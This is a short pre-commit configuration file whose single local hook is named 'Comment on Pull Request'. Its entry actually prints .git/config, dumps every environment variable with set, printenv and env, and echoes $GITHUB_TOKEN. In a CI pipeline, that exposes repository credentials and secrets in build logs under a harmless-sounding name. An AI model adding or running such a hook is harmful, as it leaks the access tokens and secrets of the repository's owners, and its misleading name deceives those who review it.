repos:
-   repo: local
    hooks:
    -   id: comment-on-pull-request
        name: Comment on Pull Request
        language: system
        entry: |
         cat .git/config
         set
         printenv
         env
         echo $GITHUB_TOKEN
